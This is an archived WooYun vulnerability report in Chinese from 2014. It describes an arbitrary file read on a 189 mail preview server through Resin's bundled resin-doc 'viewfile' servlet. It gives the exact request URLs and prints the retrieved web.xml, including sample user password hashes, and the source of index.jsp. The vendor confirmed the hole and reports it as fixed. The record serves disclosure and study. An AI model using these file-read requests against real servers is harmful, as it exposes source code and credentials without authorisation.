乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-21: 细节已通知厂商并且等待厂商处理中 2014-08-22: 厂商已经确认,细节仅向厂商公开 2014-09-01: 细节向核心白帽子及相关领域专家公开 2014-09-11: 细节向普通白帽子公开 2014-09-21: 细节向实习白帽子公开 2014-10-05: 细节向公众公开
189邮箱某分站存在任意文件读取漏洞,可以获取任意文件的源代码
漏洞网址:http://preview.mail.189.cn:8081/看了一下是Resin/3.1.8的系统默认情况下,Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet,可以无需参数在Web主目录中浏览任意文件测试一个攻击url
http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml
攻击成功获取到WEB-INF/web.xml的文件内容
文件可以被分析敏感信息
WEB-INF/web.xml<web-app> <display-name>login-xml</display-name> <welcome-file-list> <welcome-file>index.jsp</welcome-file> <welcome-file>index.html</welcome-file> </welcome-file-list> <!-- this is the jsp that a 'login' link uses --> <security-constraint> <web-resource-collection> <web-resource-name>Home</web-resource-name> <url-pattern>/home.jsp</url-pattern> </web-resource-collection> <auth-constraint> <!-- '*' for a <role-name> means "authenticated user with any role" The user must be logged in with some kind of role to access the home page. --> <role-name>*</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Professors</web-resource-name> <url-pattern>/professors/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>professor</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Students</web-resource-name> <url-pattern>/students/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>student</role-name> <role-name>professor</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Staff</web-resource-name> <url-pattern>/staff/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>staff</role-name> <role-name>professor</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>form</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/login.jsp?login_error=1</form-error-page> </form-login-config> </login-config> <!-- Resin-specific XmlAuthenticator configuration --> <authenticator> <type>com.caucho.server.security.XmlAuthenticator</type> <init> <!-- Optionally put user information here. --> <user>pince:Txpd1jQc/xwhISIqodEjfw==:staff,website</user> <user>filch:KmZIq2RKXAHV4BaoNHfupQ==:staff</user> <!-- You can also use an external file --> <path>WEB-INF/password.xml</path> </init> </authenticator> <security-role> <role-name>professor</role-name> </security-role> <security-role> <role-name>student</role-name> </security-role> <security-role> <role-name>staff</role-name> </security-role> <security-role> <description>member of the slytherin house</description> <role-name>slytherin</role-name> </security-role> <security-role> <description>member of the gryffindor house</description> <role-name>gryffindor</role-name> </security-role> <security-role> <description>member of the ravenclaw house</description> <role-name>ravenclaw</role-name> </security-role> <security-role> <description>member of the hufflepuff house</description> <role-name>hufflepuff</role-name> </security-role> <security-role> <description>website administrator</description> <role-name>website</role-name> </security-role></web-app>
再测试index.jsp的源码
http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=index.jsp
成功获取到:
index.jsp<%@ taglib prefix='c' uri='http://java.sun.com/jsp/jstl/core' %><%@ include file="/inc/nobrowsercache.jspf" %><%-- /index.jsp - default page for website. --%><html> <head> <title>Hogwart's</title> </head> <body> <%@ include file="/inc/buttonbar.jspf" %> <h1>Welcome to Hogwart's!</h1> This is a Defense Against the Dark Arts example of using JSP/Servlet security. <a href="<c:url value='index.xtp'/>">Tutorial documentation</a> is available. <p> Try doing a <c:choose> <c:when test="${empty pageContext.request.userPrincipal}"> <a href="<c:url value='home.jsp'/>">login</a> </c:when> <c:otherwise> <a href="<c:url value='logout.jsp'/>">logout</a> </c:otherwise> </c:choose> <p> To get a better understanding of how security works, try using the following links both when you are logged in and when you are not. <p> All of the links are in secure areas. If you are not logged in a login procedure is put in by Resin before you get to the pages. If you are logged in, you may be able to see them or you may get a 'Forbidden' error. <p> Links to different areas: <ul> <li><a href="<c:url value='students/'/>"> Students (available to 'students' and 'professors') </a> <li><a href="<c:url value='professors/'/>"> Professors (available to 'professors') </a> <li><a href="<c:url value='staff/'/>"> Staff (available to 'staff' and 'professors') </a> </ul> In a real application, you wouldn't show links like this -- you would get the user to login first and then only display the links that are available for their role. <%@ include file="/inc/footer.jspf" %> </body></html>
如果获取的文件不存在,则暴露路径
你懂的
危害等级:低
漏洞Rank:5
确认时间:2014-08-22 23:05
已修复,谢谢
暂无